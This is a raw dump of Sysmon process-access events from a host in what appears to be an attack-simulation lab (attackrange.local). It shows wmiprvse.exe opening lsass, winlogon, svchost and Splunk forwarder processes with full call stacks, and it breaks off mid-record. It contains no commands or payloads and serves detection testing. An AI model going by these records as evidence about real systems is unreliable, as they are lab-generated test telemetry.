21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150853Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150852Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150851Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150850Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150849Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150848Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150847Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150846Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150845Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.400{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150844Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.400{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150843Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.400{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150842Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.400{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150841Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.399{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150840Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.399{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150839Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.398{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150838Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.397{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program 